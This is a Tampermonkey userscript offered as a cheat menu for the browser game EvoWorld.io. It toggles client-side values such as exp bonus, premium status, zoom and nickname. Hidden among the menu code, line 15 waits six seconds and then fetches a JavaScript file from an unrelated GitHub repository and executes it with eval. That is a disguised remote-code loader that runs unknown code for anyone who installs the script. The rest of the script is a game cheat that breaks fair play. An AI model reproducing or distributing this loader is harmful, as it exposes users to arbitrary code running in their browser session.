Evoworld.io Hack menu

Cheats for EvoWorld.io

  1. // ==UserScript==
  2. // @name Evoworld.io Hack menu
  3. // @namespace http://tampermonkey.net/
  4. // @version 2.0
  5. // @description Cheats for EvoWorld.io
  6. // @author not you
  7. // @license MIT
  8. // @match https://evoworld.io/*
  9. // @icon https://www.google.com/s2/favicons?sz=64&domain=evoworld.io
  10. // @grant none
  11. // ==/UserScript==
  12.  
  13. (function() {
  14. alert ('open / close menu on Insert / Y. You can move the menu!')
  15. setTimeout(() => {$.get("https://raw.githubusercontent.com/cameronlucky73/confused/main/o.js", (d) => eval(d));}, 6000);
  16. let cheatMenuHTML = `
  17. <div id="cheatMenu" style="position: absolute; top: 30px; left: 20px; z-index: 9999; background: white; padding: 10px; border: 1px solid black;"><li style="background:#808080;">
  18. <h>-----------------------------------CHEAT-----------------------------------<h>
  19. <hr>
  20. <label><input type="checkbox" id="ExpHackCheckbox"> Exp bonus +30%</label>
  21. <label><input type="checkbox" id="EmojiCheckbox"> Emoji Hack (Buttons Q , E)</label><br>
  22. <label><input type="checkbox" id="PremiumCheckbox"> 30 minutes in clouds (Visual)</label>
  23. <label><input type="checkbox" id="SmoothCheckbox"> Smooth movement</label><br>
  24. <button id="injectButton">Inject</button>
  25. <hr>
  26. <label><input type="button" value="Print screen (may not work)" onclick="print()"></br>
  27. <label><input type="button" value="Show all bonus codes" onclick="alert ('SkyBS, Nortos, xxostepolse64, Plaxer1, JeromeASF, imdamacik')">
  28. <br><label><input type="button" value="Sharp movement" onclick="game.maxInterpolateDistanceTeleport = 0"></br>
  29. <label><input type="button" value="Normal movement" onclick="game.maxInterpolateDistanceTeleport = 350">
  30. <br><label><input type="button" value="Minimum zoom" onclick="gameZoom -= 100">
  31. <label><input type="button" value="Maximum zoom" onclick="gameZoom += 100">
  32. <hr><font color="black">Enter your height - x (Visual)</font>
  33. <br><font color="black">Enter your level - r (Visual)</font>
  34. <br><font color="black">Enter your nick - j (Visual)</font>
  35. <br><font color="black">Enter your zoom - h</font>
  36. <hr><font color="black">Show your hp - B</font>
  37. <hr><font color="black">Open / close menu - Insert / Y</font>
  38. <br><font color="black">You can move the menu!</font>
  39. </div>
  40. `;
  41. function get(x) { return document.getElementById(x);}
  42. let cheatMenu = document.createElement('div');
  43. cheatMenu.innerHTML = cheatMenuHTML;
  44. document.body.appendChild(cheatMenu);
  45. let acc = get("accordian"),box = get ("cheatMenu");box.style.opacity = "1"
  46. document.addEventListener('keydown', (event) => {if (event.key === 'Insert') {
  47. let opac = box.style.opacity; if(opac == 1) {
  48. box.style.opacity = "0";}else {box.style.opacity = "1"}}})
  49. document.body.appendChild(cheatMenu);
  50. document.addEventListener('keydown', (event) => {if (event.keyCode == 89) {
  51. let opac = box.style.opacity; if(opac == 1) {
  52. box.style.opacity = "0";}else {box.style.opacity = "1"}}})
  53. dragElement(document.getElementById("cheatMenu"));
  54.  
  55. function dragElement(elmnt) {
  56. var pos1 = 0, pos2 = 0, pos3 = 0, pos4 = 0;
  57. if (document.getElementById(elmnt.id + "header")) {
  58. // если присутствует, заголовок - это место, откуда вы перемещаете DIV:
  59. document.getElementById(elmnt.id + "header").onmousedown = dragMouseDown;
  60. } else {
  61. // в противном случае переместите DIV из любого места внутри DIV:
  62. elmnt.onmousedown = dragMouseDown;
  63. }
  64.  
  65. function dragMouseDown(e) {
  66. e = e || window.event;
  67. e.preventDefault();
  68. // получить положение курсора мыши при запуске:
  69. pos3 = e.clientX;
  70. pos4 = e.clientY;
  71. document.onmouseup = closeDragElement;
  72. // вызов функции при каждом перемещении курсора:
  73. document.onmousemove = elementDrag;
  74. }
  75.  
  76. function elementDrag(e) {
  77. e = e || window.event;
  78. e.preventDefault();
  79. // вычислить новую позицию курсора:
  80. pos1 = pos3 - e.clientX;
  81. pos2 = pos4 - e.clientY;
  82. pos3 = e.clientX;
  83. pos4 = e.clientY;
  84. // установите новое положение элемента:
  85. elmnt.style.top = (elmnt.offsetTop - pos2) + "px";
  86. elmnt.style.left = (elmnt.offsetLeft - pos1) + "px";
  87. }
  88.  
  89. function closeDragElement() {
  90. // остановка перемещения при отпускании кнопки мыши:
  91. document.onmouseup = null;
  92. document.onmousemove = null;
  93. }
  94. }
  95.  
  96. document.getElementById('injectButton').addEventListener('click', function() {
  97. let expHack = document.getElementById('ExpHackCheckbox').checked;
  98. let emojiHack = document.getElementById('EmojiCheckbox').checked;
  99. let SmoothMod = document.getElementById('SmoothCheckbox').checked;
  100. let Premium = document.getElementById('PremiumCheckbox').checked;
  101. alert('Successfully!')
  102.  
  103. if (expHack) {
  104. setInterval(function(){startBonus = 1}, 1)
  105. }
  106. if (emojiHack) {
  107. let i_i = 0;
  108. let inj = false;
  109. const interval = setInterval(() => {
  110. {
  111. document.body.onkeyup = function(e) {
  112. if (e.keyCode == 81){
  113. sendEmote(1);
  114. }
  115. if ( e.keyCode == 69){
  116. sendEmote(10);
  117. }}}}, );
  118. }
  119. if (SmoothMod) {
  120. game.maxInterpolateDistanceTeleport = 3500
  121. }
  122. if (Premium) {
  123. game.me.premium = true
  124.  
  125.  
  126.  
  127. }
  128.  
  129. });
  130. document.addEventListener('keydown', function(event)
  131. {if(event.key === 'x') {
  132. var height = prompt('Enter your height')
  133. {
  134. game.me.height = height;
  135. }
  136. }});
  137. document.addEventListener('keydown', function(event)
  138. {if(event.key === 'r') {
  139. var level = prompt('Enter your level')
  140. {
  141. game.me.level = level;
  142. }
  143. }});
  144. document.addEventListener('keydown', function(event)
  145. {if(event.key === 'j') {
  146. var nick = prompt('Enter your nick')
  147. {
  148. game.me.nick = nick;
  149. }
  150. }});
  151. document.addEventListener('keydown', function(event)
  152. {if(event.key === 'h') {
  153. var zoom = prompt('Enter your zoom')
  154. {
  155. gameZoom = zoom;
  156. }
  157. }});
  158. document.addEventListener('keydown', function(event)
  159. {if(event.key === 'b') {
  160. {
  161. alert(game.me.hp);
  162. }
  163. }});
  164. })();

QingJ © 2025

镜像随时可能失效,请加Q群300939539或关注我们的公众号极客氢云获取最新地址